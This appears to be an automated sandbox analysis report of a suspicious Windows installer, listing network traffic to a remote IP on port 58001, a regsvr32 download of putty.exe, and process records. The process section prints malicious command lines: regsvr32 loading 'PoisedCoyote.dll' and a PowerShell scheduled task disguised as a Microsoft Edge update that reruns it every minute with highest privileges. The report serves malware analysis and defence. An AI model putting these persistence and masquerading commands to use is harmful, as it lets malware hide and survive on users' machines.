                                                                  Nov 21, 2024 02:59:54.788511992 CET5800149904154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:54.788599014 CET4990458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:54.908061028 CET5800149904154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:55.980904102 CET5800149904154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:55.981020927 CET4990458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:55.981142044 CET4990458001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:56.095489979 CET4990758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:56.100819111 CET5800149904154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:56.214972019 CET5800149907154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:56.215167046 CET4990758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:56.215698004 CET4990758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:56.335627079 CET5800149907154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:56.335695028 CET4990758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:56.455208063 CET5800149907154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:57.529932022 CET5800149907154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:57.530035973 CET4990758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:57.530200958 CET4990758001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:57.642497063 CET4991358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:57.649703979 CET5800149907154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:57.762204885 CET5800149913154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:57.765491009 CET4991358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:57.766113043 CET4991358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:57.885528088 CET5800149913154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:57.885725975 CET4991358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:58.005239964 CET5800149913154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:59.170463085 CET5800149913154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:59.173572063 CET4991358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:59.173667908 CET4991358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:59.283030033 CET4991958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:59.293107986 CET5800149913154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:59.402462006 CET5800149919154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:59.402559042 CET4991958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:59.403177023 CET4991958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:59.522650003 CET5800149919154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:59.522716999 CET4991958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:59.642427921 CET5800149919154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:00.767720938 CET5800149919154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:00.767832994 CET4991958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:00.767951012 CET4991958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:00.876796007 CET4992058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:00.887459040 CET5800149919154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:00.996475935 CET5800149920154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:00.996556044 CET4992058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:00.997181892 CET4992058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:01.116682053 CET5800149920154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:01.116785049 CET4992058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:01.236224890 CET5800149920154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:02.398812056 CET5800149920154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:02.398895025 CET4992058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:02.399024963 CET4992058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:02.501902103 CET4992658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:02.518434048 CET5800149920154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:02.621438980 CET5800149926154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:02.621639013 CET4992658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:02.622119904 CET4992658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:02.742798090 CET5800149926154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:02.742906094 CET4992658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:02.864130020 CET5800149926154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:04.030106068 CET5800149926154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:04.030181885 CET4992658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:04.030307055 CET4992658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:04.142430067 CET4993258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:04.149787903 CET5800149926154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:04.262377977 CET5800149932154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:04.265563011 CET4993258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:04.266258955 CET4993258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:04.385736942 CET5800149932154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:04.389461994 CET4993258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:04.509097099 CET5800149932154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:05.671639919 CET5800149932154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:05.671750069 CET4993258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:05.671931028 CET4993258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:05.790879011 CET4993558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:05.791372061 CET5800149932154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:05.910409927 CET5800149935154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:05.910497904 CET4993558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:05.911139011 CET4993558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:06.030641079 CET5800149935154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:06.030731916 CET4993558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:06.150255919 CET5800149935154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:07.314110994 CET5800149935154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:07.317537069 CET4993558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:07.317656040 CET4993558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:07.423775911 CET4993958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:07.437794924 CET5800149935154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:07.543544054 CET5800149939154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:07.543780088 CET4993958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:07.544296026 CET4993958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:07.664200068 CET5800149939154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:07.664364100 CET4993958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:07.783956051 CET5800149939154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:08.905065060 CET5800149939154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:08.905224085 CET4993958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:08.905347109 CET4993958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:09.017436028 CET4994558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:09.025091887 CET5800149939154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:09.137139082 CET5800149945154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:09.137212038 CET4994558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:09.138066053 CET4994558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:09.260020018 CET5800149945154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:09.260116100 CET4994558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:09.379774094 CET5800149945154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:10.657929897 CET5800149945154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 03:00:10.658735991 CET4994558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:10.658849001 CET4994558001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 03:00:10.778327942 CET5800149945154.216.19.129192.168.2.4

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 21, 2024 02:58:55.280458927 CET6435153192.168.2.41.1.1.1
                                                                  Nov 21, 2024 02:58:55.649744987 CET53643511.1.1.1192.168.2.4

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Nov 21, 2024 02:58:55.280458927 CET192.168.2.41.1.1.10x8eb5Standard query (0)the.earth.liA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Nov 21, 2024 02:58:55.649744987 CET1.1.1.1192.168.2.40x8eb5No error (0)the.earth.li93.93.131.124A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • the.earth.li

                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.44973893.93.131.1244437688C:\Windows\System32\regsvr32.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-21 01:58:57 UTC98OUTGET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1
                                                                  Host: the.earth.li
                                                                  Connection: Keep-Alive
                                                                  2024-11-21 01:58:57 UTC227INHTTP/1.1 302 Found
                                                                  Date: Thu, 21 Nov 2024 01:58:57 GMT
                                                                  Server: Apache
                                                                  Location: https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exe
                                                                  Content-Length: 302
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  2024-11-21 01:58:57 UTC302INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 2e 65 61 72 74 68 2e 6c 69 2f 7e 73 67 74 61 74 68 61 6d 2f 70 75 74 74 79 2f 30 2e 38 31 2f 77 33 32 2f 70 75 74 74 79 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exe">here</a>.</p><hr><address>Apache Server at


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.44974693.93.131.1244437688C:\Windows\System32\regsvr32.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-21 01:59:01 UTC98OUTGET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1
                                                                  Host: the.earth.li
                                                                  Connection: Keep-Alive
                                                                  2024-11-21 01:59:01 UTC227INHTTP/1.1 302 Found
                                                                  Date: Thu, 21 Nov 2024 01:59:01 GMT
                                                                  Server: Apache
                                                                  Location: https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exe
                                                                  Content-Length: 302
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  2024-11-21 01:59:01 UTC302INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 2e 65 61 72 74 68 2e 6c 69 2f 7e 73 67 74 61 74 68 61 6d 2f 70 75 74 74 79 2f 30 2e 38 31 2f 77 33 32 2f 70 75 74 74 79 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://the.earth.li/~sgtatham/putty/0.81/w32/putty.exe">here</a>.</p><hr><address>Apache Server at


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:20:58:03
                                                                  Start date:20/11/2024
                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                  Imagebase:0x400000
                                                                  File size:1'769'630 bytes
                                                                  MD5 hash:FECD099F9B8D9500D7199A1054397E3F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:1
                                                                  Start time:20:58:03
                                                                  Start date:20/11/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp" /SL5="$10478,1389145,140800,C:\Users\user\Desktop\file.exe"
                                                                  Imagebase:0x400000
                                                                  File size:1'160'704 bytes
                                                                  MD5 hash:14C6FA8E50B4147075EB922BD0C8B28D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Antivirus matches:
                                                                  • Detection: 2%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:20:58:04
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:20:58:04
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:20:58:04
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /T 3
                                                                  Imagebase:0x6d0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:20:58:07
                                                                  Start date:20/11/2024
                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                  Imagebase:0x400000
                                                                  File size:1'769'630 bytes
                                                                  MD5 hash:FECD099F9B8D9500D7199A1054397E3F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:20:58:07
                                                                  Start date:20/11/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp" /SL5="$700F8,1389145,140800,C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                  Imagebase:0x400000
                                                                  File size:1'160'704 bytes
                                                                  MD5 hash:14C6FA8E50B4147075EB922BD0C8B28D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Antivirus matches:
                                                                  • Detection: 2%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:20:58:07
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll"
                                                                  Imagebase:0x3c0000
                                                                  File size:20'992 bytes
                                                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:8
                                                                  Start time:20:58:07
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll"
                                                                  Imagebase:0x7ff7fe480000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:9
                                                                  Start time:20:58:11
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:10
                                                                  Start time:20:58:11
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:14
                                                                  Start time:20:58:22
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D7C2DB06-FCF6-4992-AF37-53F140CD5A88}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:15
                                                                  Start time:20:58:22
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:16
                                                                  Start time:20:58:25
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll
                                                                  Imagebase:0x7ff7fe480000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:17
                                                                  Start time:20:58:32
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:18
                                                                  Start time:20:58:32
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Executed Functions

                                                                    Function 00007FFD9B1DA4E0 Relevance: .2, Instructions: 247COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1926218612.00007FFD9B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9b1d0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eccacc5ecdeee567d6612bdc617b986b20d245bcbc723a486c47b9d5daaf4d6f
                                                                    • Instruction ID: 1813a7421218b03dd42d01eefd279a7de6fadf71a9b8f33d566e1a26b6afe848
                                                                    • Opcode Fuzzy Hash: eccacc5ecdeee567d6612bdc617b986b20d245bcbc723a486c47b9d5daaf4d6f
                                                                    • Instruction Fuzzy Hash: 0901263190C7888FDB55DFACD8493A8BBE0EB42330F0481ABC149C71A2D3796416CB52
                                                                    Function 00007FFD9B1D9478 Relevance: .2, Instructions: 235COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1926218612.00007FFD9B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9b1d0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cc59303bfc15233af2ba81d74fa13d13cb5776e229aaea9c05de7c832ae0f0e3
                                                                    • Instruction ID: 5d5b39fa5825d986de26ac68857f16997280fbbcba5997d2c41a51d71b8dd0e4
                                                                    • Opcode Fuzzy Hash: cc59303bfc15233af2ba81d74fa13d13cb5776e229aaea9c05de7c832ae0f0e3
                                                                    • Instruction Fuzzy Hash: 39614A72E0EBCA0FE7259B6C582E1B97BE0FF96354F0502BBD09897193DA1479058391
                                                                    Function 00007FFD9B0BE384 Relevance: .1, Instructions: 131COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1925369656.00007FFD9B0BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B0BD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9b0bd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: becd15097975561bab135fa916ad64c04bb46c9a1addf812dd264f461da8780e
                                                                    • Instruction ID: 3a35a7a82624b8c8d7079af7f4cd8384de3601c4b1023a42b4699fe107436dff
                                                                    • Opcode Fuzzy Hash: becd15097975561bab135fa916ad64c04bb46c9a1addf812dd264f461da8780e
                                                                    • Instruction Fuzzy Hash: B041047190EB884FE7A68B2898559523FB0EF53320B1505EFD08CCB1A3D625A806CB92
                                                                    Function 00007FFD9B1DA67C Relevance: .1, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1926218612.00007FFD9B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9b1d0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 77639dffae2e5a77f616a71079a7d5798ef41622f68383e39aeaf55f0b686c57
                                                                    • Instruction ID: 3f87ff8749d43faf3c10ff975c70db9c9a0366b3304cbc41ab148e5676fe781b
                                                                    • Opcode Fuzzy Hash: 77639dffae2e5a77f616a71079a7d5798ef41622f68383e39aeaf55f0b686c57
